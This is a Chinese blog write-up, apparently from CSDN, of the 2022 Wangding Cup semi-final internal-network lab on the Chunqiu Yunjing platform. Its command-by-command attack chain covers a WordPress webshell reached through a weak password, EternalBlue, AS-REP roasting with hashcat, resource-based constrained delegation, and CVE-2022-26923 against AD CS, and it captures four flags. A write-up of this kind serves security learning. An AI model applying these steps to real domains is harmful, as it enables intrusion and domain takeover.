春秋云镜-2022网鼎杯半决赛复盘-Writeup

已于 2023-08-14 13:58:15 修改
阅读量863 收藏 2
点赞数
分类专栏: # 仿真场景-多维挑战 文章标签: 安全 web安全 网络安全 linux 服务器
于 2023-08-14 13:53:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35607078/article/details/132274449
版权

靶标介绍:
该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。

开局一个IP

39.xx.xx.xx

扫描结果

39.xx.xx.xx:22 open
39.xx.xx.xx:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.xx.xx.xx       code:200 len:39962  title:XIAORANG.LAB

80端口有一个wordpress
弱口令进后台 admin 123456
通过编辑插件getshell
http://39.xx.xx.xx/wp-admin/theme-editor.php?file=404.php&theme=twentytwentyone

AntSword 连接
/wp-content/themes/twentytwentyone/404.php

读取flag01.txt

flag{08bcaae8-6cac-468c-a8e9-94d52d27e9e0}

使用wget远程下载好fscan 以及 frp 这里不详细说明,具体文章可以看我前几篇靶场wp
内网扫描结果

(icmp) Target 172.22.15.24    is alive
(icmp) Target 172.22.15.13    is alive
(icmp) Target 172.22.15.18    is alive
(icmp) Target 172.22.15.26    is alive
(icmp) Target 172.22.15.35    is alive
[*] Icmp alive hosts len is: 5
172.22.15.13:135 open
172.22.15.26:22 open
172.22.15.24:3306 open
172.22.15.35:445 open
172.22.15.18:445 open
172.22.15.13:445 open
172.22.15.24:445 open
172.22.15.35:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.35:135 open
172.22.15.24:139 open
172.22.15.18:135 open
172.22.15.24:135 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.13:88 open
[*] alive ports len is: 18
start vulscan
[+] NetInfo:
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[+] NetInfo:
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[+] NetInfo:
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] 172.22.15.35         XIAORANG\XR-0687
[+] 172.22.15.24        MS17-010        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.15.13  (Windows Server 2016 Standard 14393)
[*] 172.22.15.13   [+]DC XIAORANG\XR-DC01           Windows Server 2016 Standard 14393
[+] NetInfo:
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[*] 172.22.15.24         WORKGROUP\XR-WIN08          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 172.22.15.18         XIAORANG\XR-CA             Windows Server 2016 Standard 14393
[*] WebTitle:http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle:http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[+] http://172.22.15.18 poc-yaml-active-directory-certsrv-detect
[*] WebTitle:http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www
[*] WebTitle:http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

有永恒之蓝,先用msf打永恒之蓝
多打几遍就行

读到了flag02.txt

flag02: flag{5fbdebc5-01fc-43c8-aab8-a21e55af11ca}

到这里其他主机就没什么服务了,猜测是要在这台永恒之蓝主机上进行信息收集

修改密码远程上去查看数据库


里面有大量的账号信息

看一下是否存在有不要求Kerberos 预身份验证的账户

impacket-GetNPUsers -dc-ip 172.22.15.13  xiaorang.lab/ -usersfile auser.txt

拿到hashcat解密

hashcat hash.txt /usr/share/wordlist/rockyou.txt


lixiuying winniethepooh
huachunmei 1qaz2wsx

用账号xiaorang.lab\lixiuying 远程登录下 172.22.15.35

上传Bloodhound 进行域内分析

可以看到LIXIUYING用户对XR-0687.xiaorang.lab 有GenericWrite权限,那么我们就可以利用基于资源的委派实现提权的效果

首先添加一个机器账户

impacket-addcomputer -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name 01\$ -computer-pass Passw0rd -dc-ip 172.22.15.13

获取机器账户的sid

Import-Module .\PowerView.ps1
Get-NetComputer 01 -Properties objectsid


S-1-5-21-3745972894-1678056601-2622918667-1148

修改服务资源msDS-AllowedToActOnBehalfOfOtherIdentity属性

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1148)";$SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose


创建服务票据

impacket-getST xiaorang.lab/01\$:Passw0rd -spn cifs/XR-0687.xiaorang.lab -impersonate administrator -dc-ip 172.22.15.13

导入票据

export KRB5CCNAME=administrator.ccache

读取flag

 impacket-wmiexec -no-pass  -k XR-0687.xiaorang.lab

CVE-2022–26923 && RBCD Attack 拿下DC
首先 先添加一个用户

 impacket-addcomputer -method SAMR xiaorang.lab/lixiuying:winniethepooh -computer-name 02\$ -computer-pass Passw0rd -dc-ip 172.22.15.13


之后在利用certipy修改02的dNSHostName

certipy account update -u "lixiuying@xiaorang.lab" -p winniethepooh  -user '02' -dns "XR-DC01.xiaorang.lab" -dc-ip 172.22.15.13


certipy req -u '02$@xiaorang.lab'  -p  Passw0rd   -ca xiaorang-XR-CA-CA  -template Machine -dc-ip 172.22.15.18

在用dNSHostName欺骗ADCS获取一份DC机器账户的证书 这里的dc-ip指向 ADCS
-ca 用 certutil -config - -ping 进行定位

之后便获取到一份颁布给域控机器账户的证书
预期是我们能通过这份证书申请到域控机器的hash然后再进行DCsync攻击获取域控的hash从而拿下整个域控
但是因为ldaps出现问题,导致我们无法顺利申请

 certipy auth  -pfx xr-dc01.pfx  -username xr-dc01$  -domain xiaorang.lab  -dc-ip 172.22.15.13



文章给出的解决办法是上去重置ldpas,但是我们显然没这个条件
但是我们可以利用RBCD拿下域控机器账户
先将证书转为 xr-dc01.pem 密码为空

openssl pkcs12 -in xr-dc01.pfx -out xr-dc01.pem -nodes

紧接着在修改域控的msDS-AllowedToActOnBehalfOfOtherIdentity的属性,此过程默认是通过ldap认证的,所以我们用不到ldaps

python3 bloodyAD.py -d xiaorang.lab -u lixiuying -p 'winniethepooh' --host 172.22.15.13  -c ":xr-dc01.pem"  setRbcd '02$' 'xr-dc01$'


紧接着就用getST去申请TGS票据

impacket-getST xiaorang.lab/02\$:Passw0rd -spn cifs/xr-dc01.xiaorang.lab -impersonate administrator -dc-ip  172.22.15.13


将ccache导入到当前会话

 export KRB5CCNAME=administrator.ccache

然后在用impacket打域控

impacket-wmiexec -k xr-dc01.xiaorang.lab -no-pass

这一步需要修改下hosts指向域控

成功拿下最后一个flag

flag04: flag{c1926c16-be22-4f2a-bc57-4eef1d708f20}
NaNN!
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1
春秋云境2022网鼎杯半决赛-WP【一遍过】
weixin_63576152的博客
10-17 362
注意,这里的certipy不是出现命令不存在kali让你下载的那个,这个是个打CVE-2022–26923的工具:https://github.com/ly4k/Certipy/打开http://172.22.15.24/phpmyadmin用账号和密码登了一下,发现有个表有一堆域账户。(脚本链接:https://github.com/AlmondOffSec/PassTheCert/)wordpress,打开http://39.99.137.31/wp-admin。原来是**校园网,后来换热点就可以了。
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
2020网鼎杯网络安全夺旗赛半决赛题目源代码。 2020,网鼎杯网络安全夺旗赛,CTF, AWD PLUS, 源代码,题目复现,渗透复现。
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 程序如何运行 部分 x86组装 通话约定 实验2-打开/读取/写入 外壳编码 堆栈溢出 缓冲区溢出 返回文本/ Shellcode 实验3-ret2shellcode 保护ASLR / DEP / PIE / StackGuard 延迟绑定 返回图书馆实验4-ret2lib 面向返
2022网鼎杯初赛玄武组赛题
10-18
2022网鼎杯初赛玄武组赛题
2022网鼎杯半决赛复盘
龙狼刺的博客
07-12 1495
该靶场为2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4个flag,分布于不同的靶机。
xray Web扫描器学习记录
weixin_50464560的博客
06-06 3866
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
Active Directory 证书服务(一)
ZAWX_NETSTARSEC的博客
08-19 2390
Active Directory 证书服务(一) 0x00 前言 specterops发布了一篇关于Active Directory 证书服务相关漏洞的白皮书 https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf,关于Active Directory 证书服务的攻击第一次系统的进入我们的视野。 我在白皮书的基础上学习了Active Directory 证书服务相关的漏洞,作为学习成果,用两篇文章来介绍Active Directo
2022第三届网鼎杯网络安全大赛-青龙组 部分WriteUp
渗透测试研究中心
08-29 6467
MISC 签到题 八道网络安全选择题,百度都能搜索到答案,这里如果只知道部分题目答案,可以通过枚举测试fuzz答案,获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话,要求输入有六个参数并且第三个为gLIhR的函数、被调用三次并且会调用到cHZv5......
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
网鼎杯writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用[email protected]
2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件
09-19
2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件 2022第三届网鼎杯网络安全大赛(青龙组)部分题目附件
2022第三届网鼎杯网络安全大赛(玄武组)【re557】
09-11
2022第三届网鼎杯网络安全大赛(玄武组)【re557】
网鼎杯2020半决赛awdplus题目
12-07
网鼎杯2020半决赛awd plus题目,包含pwn和web,解压密码在公告文本里。pwn ciri未开放无解压密码
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
概念解析 | 威胁建模与DREAD评估:构建安全的系统防线
最新发布
NLOS的博客
05-05 320
在信息安全领域,威胁建模就像是一位睿智的军师,他审时度势,为系统安全布局。这位军师会仔细分析系统的架构,找出其中潜在的薄弱环节,预判可能出现的安全威胁。他会问自己这样的问题:“如果我是敌人,我会从哪里发起进攻?我的目标是什么?我会利用系统的哪些漏洞?通过这样的分析,威胁建模可以帮助我们更全面、更系统地评估系统面临的安全风险,找出最需要防范的威胁,并有针对性地制定防御策略。这就像是在城墙上加固门禁,在易受攻击的地方布置更多的守卫。
PHP医疗不良事件上报系统源码 AEMS开发工具vscode+ laravel8 医院安全(不良)事件报告系统源码 可提供演示
zmm201453的博客
05-04 822
医院安全不良事件报告系统(AEMS);分为外部报告系统和内部报告系统两类。内部报告系统主要以个人为报告单位,由医院护理主管部门自行管理的报告系统。外部报告系统主要以医院护理主管部门为报告单位,由卫生行政部门或行业组织管理的报告 系统。
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值